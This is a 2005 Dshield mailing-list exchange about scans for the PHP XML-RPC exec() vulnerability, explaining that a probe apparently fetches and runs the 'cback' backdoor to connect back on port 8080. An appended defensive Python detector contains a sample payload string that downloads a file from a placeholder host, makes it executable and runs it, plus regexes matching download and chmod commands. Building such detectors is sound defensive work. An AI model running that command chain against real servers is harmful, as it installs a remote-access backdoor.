[Dshield] Someone is scanning for PHP XML RPC vulnerability

Tom dshield at oitc.com
Tue Oct 11 13:09:53 GMT 2005

At 9:31 AM +0200 10/11/05, Stephane Grobety wrote:
>Apparently, someone is actively scanning for the PHP XMLRPC flaw. All
>my web servers and three completely separate networks have been probed.
>All the probes came from the same source IP:
>The following locations are probed:
>Unfortunately, I don't quite understand the command it gives to the
>script, I think it's trying to connect back to on 8080
>and the presence of chmod, in seems to indicate that it targets unix
>The relevant parameter is:
>Does someone understand this script?

Exploit was documented back in the summer and if users patched they 
should be OK. As stated in 
http://forum.hardened-php.net/viewtopic.php?id=9 it's an exec() 
exploit. What the above looks like is a piece of broken(?) code. The 
".60.255.44/cback" would appear to be broken. It probably was a 
curl/get from some IP of the code/script called cback, which is made 
executable and executed with parameters of 8080. cback 
appears to be the remote access trojan, BackDoor-CTM.
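
As an added illustration from the defender's side (not code from this thread or from hardened-php): a heuristic that inspects a captured XML-RPC request body for the fetch, chmod and connect-back-run chain Tom describes. The sample bodies and the 203.0.113.5 address are constructed, and the regexes are assumptions of mine, not a published signature.

```python
import re
from typing import NamedTuple

# Constructed XML-RPC request bodies for testing (not captured traffic).
# 203.0.113.5 is a documentation-range placeholder, not a real scanner.
PROBE_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>test.method</methodName>'
    "<params><param><value><string>x; curl http://203.0.113.5/cback -o cback; "
    "chmod +x cback; ./cback 8080</string></value></param></params></methodCall>"
)
PARTIAL_BODY = (
    "<methodCall><methodName>test.method</methodName><params><param><value>"
    "<string>curl http://203.0.113.5/notes.txt</string></value></param></params></methodCall>"
)
BENIGN_BODY = "<methodCall><methodName>system.listMethods</methodName><params/></methodCall>"

# Three independent signals (assumed heuristics): a download tool given a path,
# a chmod that sets a mode on a file, and a relative binary launched with a
# numeric (port-like) argument such as the 8080 seen in the probe.
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget|fetch|lynx)\b[^;&|]*?\S+/\S+", re.I)
CHMOD_RE = re.compile(r"\bchmod\s+(?:[ugoa]*\+[rwx]+|[0-7]{3,4})\s+\S+")
RUN_RE = re.compile(r"(?:^|[;&|`])\s*\.?/[\w.-]+\s+\d{2,5}\b")

class Verdict(NamedTuple):
    suspicious: bool
    reasons: tuple

def inspect_xmlrpc_body(body: str) -> Verdict:
    """Flag an XML-RPC call whose payload carries a fetch / chmod / run chain.

    Requiring any two of the three signals avoids firing on one stray word,
    yet still catches a garbled probe where one piece (e.g. the URL) is mangled.
    """
    if "<methodCall" not in body:
        return Verdict(False, ())  # not an XML-RPC request at all
    reasons = []
    if DOWNLOAD_RE.search(body):
        reasons.append("download tool with a path")
    if CHMOD_RE.search(body):
        reasons.append("chmod sets a mode on a file")
    if RUN_RE.search(body):
        reasons.append("relative binary run with a numeric argument")
    return Verdict(len(reasons) >= 2, tuple(reasons))

if __name__ == "__main__":
    for name, body in [("probe", PROBE_BODY), ("partial", PARTIAL_BODY), ("benign", BENIGN_BODY)]:
        print(name, inspect_xmlrpc_body(body))
```

Feed it request bodies from a mod_security audit log or an IDS capture; plain access logs do not record POST bodies, so they are not enough on their own.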

